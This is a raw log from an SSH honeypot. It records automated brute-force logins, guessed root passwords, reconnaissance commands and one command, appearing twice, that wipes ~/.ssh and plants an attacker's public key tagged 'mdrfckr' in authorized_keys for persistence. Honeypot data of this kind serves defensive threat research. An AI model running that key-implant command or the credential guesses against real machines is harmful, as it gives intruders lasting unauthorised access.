{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":22941,"dst_ip":"1.2.3.4","dst_port":22,"session":"d94763e33205","protocol":"ssh","message":"New connection: 45.125.211.194:22941 (1.2.3.4:22) [session: d94763e33205]","sensor":"my-vps","timestamp":"2025-08-28T03:28:38.937588Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:28:38.972519Z","src_ip":"45.125.211.194","session":"d94763e33205"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:28:39.160641Z","src_ip":"45.125.211.194","session":"d94763e33205"}
{"eventid":"cowrie.login.failed","username":"mysql","password":"mysql","message":"login attempt [mysql/mysql] failed","sensor":"my-vps","timestamp":"2025-08-28T03:28:39.985547Z","src_ip":"45.125.211.194","session":"d94763e33205"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:28:41.197109Z","src_ip":"45.125.211.194","session":"d94763e33205"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33116,"dst_ip":"1.2.3.4","dst_port":22,"session":"0dde964efe72","protocol":"ssh","message":"New connection: 212.227.235.229:33116 (1.2.3.4:22) [session: 0dde964efe72]","sensor":"my-vps","timestamp":"2025-08-28T03:28:47.308192Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:28:47.309086Z","src_ip":"212.227.235.229","session":"0dde964efe72"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:28:47.568898Z","src_ip":"212.227.235.229","session":"0dde964efe72"}
{"eventid":"cowrie.login.success","username":"root","password":"!Q@W3e4r","message":"login attempt [root/!Q@W3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:28:48.656063Z","src_ip":"212.227.235.229","session":"0dde964efe72"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:28:49.203263Z","src_ip":"212.227.235.229","session":"0dde964efe72"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:28:49.204289Z","src_ip":"212.227.235.229","session":"0dde964efe72"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:28:49.466633Z","src_ip":"212.227.235.229","session":"0dde964efe72"}
{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:28:49.468204Z","src_ip":"212.227.235.229","session":"0dde964efe72"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":23370,"dst_ip":"1.2.3.4","dst_port":22,"session":"4e14b5f041b7","protocol":"ssh","message":"New connection: 45.125.211.194:23370 (1.2.3.4:22) [session: 4e14b5f041b7]","sensor":"my-vps","timestamp":"2025-08-28T03:28:53.928345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:28:53.942497Z","src_ip":"45.125.211.194","session":"4e14b5f041b7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:28:54.148976Z","src_ip":"45.125.211.194","session":"4e14b5f041b7"}
{"eventid":"cowrie.login.success","username":"root","password":"P@55w0rd","message":"login attempt [root/P@55w0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:28:54.969141Z","src_ip":"45.125.211.194","session":"4e14b5f041b7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:28:55.477838Z","src_ip":"45.125.211.194","session":"4e14b5f041b7"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:28:55.478635Z","src_ip":"45.125.211.194","session":"4e14b5f041b7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:28:55.720061Z","src_ip":"45.125.211.194","session":"4e14b5f041b7"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:28:55.721441Z","src_ip":"45.125.211.194","session":"4e14b5f041b7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46117,"dst_ip":"1.2.3.4","dst_port":22,"session":"d1f044a602a3","protocol":"ssh","message":"New connection: 212.227.235.229:46117 (1.2.3.4:22) [session: d1f044a602a3]","sensor":"my-vps","timestamp":"2025-08-28T03:29:01.989782Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:29:02.074031Z","src_ip":"212.227.235.229","session":"d1f044a602a3"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:29:02.178859Z","src_ip":"212.227.235.229","session":"d1f044a602a3"}
{"eventid":"cowrie.login.success","username":"root","password":"Admin@2023","message":"login attempt [root/Admin@2023] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:29:02.587951Z","src_ip":"212.227.235.229","session":"d1f044a602a3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:29:02.865929Z","src_ip":"212.227.235.229","session":"d1f044a602a3"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:29:02.866760Z","src_ip":"212.227.235.229","session":"d1f044a602a3"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T03:29:02.867642Z","src_ip":"212.227.235.229","session":"d1f044a602a3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:29:03.058731Z","src_ip":"212.227.235.229","session":"d1f044a602a3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:29:03.250833Z","src_ip":"212.227.235.229","session":"d1f044a602a3"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T03:29:03.251720Z","src_ip":"212.227.235.229","session":"d1f044a602a3"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T03:29:03.345267Z","src_ip":"212.227.235.229","session":"d1f044a602a3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:29:03.346382Z","src_ip":"212.227.235.229","session":"d1f044a602a3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46118,"dst_ip":"1.2.3.4","dst_port":22,"session":"585d54122787","protocol":"ssh","message":"New connection: 212.227.235.229:46118 (1.2.3.4:22) [session: 585d54122787]","sensor":"my-vps","timestamp":"2025-08-28T03:29:03.429325Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:29:03.553656Z","src_ip":"212.227.235.229","session":"585d54122787"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:29:03.640902Z","src_ip":"212.227.235.229","session":"585d54122787"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T03:29:04.037254Z","src_ip":"212.227.235.229","session":"585d54122787"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62956,"dst_ip":"1.2.3.4","dst_port":22,"session":"c25a670f9e49","protocol":"ssh","message":"New connection: 212.227.235.229:62956 (1.2.3.4:22) [session: c25a670f9e49]","sensor":"my-vps","timestamp":"2025-08-28T03:29:04.469745Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T03:29:04.470845Z","src_ip":"212.227.235.229","session":"c25a670f9e49"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:29:05.133174Z","src_ip":"212.227.235.229","session":"585d54122787"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T03:29:05.173185Z","src_ip":"212.227.235.229","session":"c25a670f9e49"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46119,"dst_ip":"1.2.3.4","dst_port":22,"session":"00a82690e74e","protocol":"ssh","message":"New connection: 212.227.235.229:46119 (1.2.3.4:22) [session: 00a82690e74e]","sensor":"my-vps","timestamp":"2025-08-28T03:29:05.227842Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.9.6","message":"Remote SSH version: SSH-2.0-libssh_0.9.6","sensor":"my-vps","timestamp":"2025-08-28T03:29:05.228703Z","src_ip":"212.227.235.229","session":"00a82690e74e"}
{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:29:05.324906Z","src_ip":"212.227.235.229","session":"00a82690e74e"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:29:05.745267Z","src_ip":"212.227.235.229","session":"00a82690e74e"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:29:05.834962Z","src_ip":"212.227.235.229","session":"d1f044a602a3"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:29:05.835975Z","src_ip":"212.227.235.229","session":"00a82690e74e"}
{"eventid":"cowrie.login.failed","username":"user","password":"sooner","message":"login attempt [user/sooner] failed","sensor":"my-vps","timestamp":"2025-08-28T03:29:05.893663Z","src_ip":"212.227.235.229","session":"c25a670f9e49"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":38474,"dst_ip":"1.2.3.4","dst_port":22,"session":"98783151074b","protocol":"ssh","message":"New connection: 194.233.79.134:38474 (1.2.3.4:22) [session: 98783151074b]","sensor":"my-vps","timestamp":"2025-08-28T03:29:06.231729Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:29:06.234730Z","src_ip":"194.233.79.134","session":"98783151074b"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:29:06.541408Z","src_ip":"194.233.79.134","session":"98783151074b"}
{"eventid":"cowrie.login.failed","username":"user","password":"shitty","message":"login attempt [user/shitty] failed","sensor":"my-vps","timestamp":"2025-08-28T03:29:07.054720Z","src_ip":"212.227.235.229","session":"c25a670f9e49"}
